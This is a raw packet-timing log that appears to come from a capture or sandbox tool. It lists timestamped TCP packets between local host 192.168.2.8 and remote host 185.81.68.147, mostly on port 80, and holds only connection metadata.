                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.245235920 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.245858908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.245980978 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.246048927 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.252093077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.252144098 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.252155066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.252239943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.252293110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.252305984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.252320051 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.252414942 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.252414942 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.252415895 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.252466917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.252479076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.252638102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.252650976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.252662897 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.252825022 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.252825022 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.252825022 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.255851984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.255920887 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.255933046 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.256058931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.256069899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.256083965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.256091118 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.256091118 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.256100893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.256141901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.256220102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.256314993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.256406069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.256660938 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.256661892 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.257306099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.257419109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.257829905 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.258327007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.258433104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.258548975 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.259176970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.259330988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.259373903 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.260098934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.260251045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.260627031 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.261460066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.261476040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.261954069 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.262851000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.262902975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.263017893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.263143063 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.263345003 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.263345003 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.264030933 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.264132023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.264223099 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.264898062 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.265081882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.265680075 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.265952110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.299346924 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.408021927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.408122063 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.408222914 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.408346891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.408586979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.408622026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.408674002 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.409564018 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.409604073 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.409682989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.410485983 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.410629988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.410839081 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.411683083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.411842108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.411874056 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.412489891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.412543058 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.412611961 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.413412094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.413516045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.413695097 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.414262056 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.414297104 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.414345980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.415277004 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.415330887 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.415455103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.416202068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.416332960 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.416376114 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.417146921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.417279005 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.417279959 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.418090105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.418142080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.418275118 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.419275999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.419334888 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.419344902 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.420066118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.420207977 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.420295000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.421003103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.421068907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.421101093 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.421885967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.421956062 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.422023058 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.422924042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.422971964 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.423027039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.423841953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.423911095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.423964024 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.424789906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.424890041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.424947977 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.425712109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.425757885 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.425810099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.426687002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.426736116 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.426814079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.427642107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.427695036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.427747965 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.428555012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.428602934 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.428658962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.429527998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.429615974 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.429616928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.430475950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.430545092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.430577040 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.431427956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.431494951 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.431564093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.432430029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.432483912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.432498932 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.433315992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.433427095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.433450937 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.434278011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.434392929 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.434449911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.435239077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.435329914 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.435340881 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.436904907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.437172890 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.437244892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.437294960 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.437330961 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.437339067 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.438079119 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.438232899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.438530922 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.439018965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.439060926 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.439162970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.439980984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.440032959 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.440083027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.440929890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.440995932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.440996885 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.441886902 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.441962957 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.442008018 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.442861080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.442915916 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.442970991 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.443799973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.443856955 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.443906069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.444763899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.444839001 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.444842100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.445718050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.445768118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.445801020 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.445990086 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.446690083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.446755886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.446810961 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.447617054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.447685003 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.447738886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.448576927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.448690891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.448766947 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.449517965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.449588060 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.449666977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.451013088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.451138020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.451169968 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.451447010 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.451505899 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.451508999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.452387094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.452447891 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.452513933 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.453386068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.453452110 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.453512907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.454350948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.454416037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.454435110 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.455254078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.455342054 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.455349922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.456192970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.456314087 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.456315041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.457113981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.457276106 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.457276106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.498795033 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.504154921 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.600373983 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.600446939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.600568056 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.600730896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.600840092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.601139069 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.601656914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.601748943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.601955891 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.602566957 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.602790117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.603142977 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.603499889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.603588104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.604193926 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.604434013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.604511976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.604677916 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.605416059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.605496883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.605571032 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.606379986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.606467962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.606808901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.607359886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.607460976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.607875109 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.608339071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.608412981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.608464956 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.609210014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.609304905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.609558105 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.610198975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.610282898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.611076117 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.611124992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.611238003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.611332893 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.612097025 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.612229109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.612795115 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.613060951 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.613266945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.613941908 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.613976955 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.614094019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.614538908 CET4970980192.168.2.8185.81.68.147
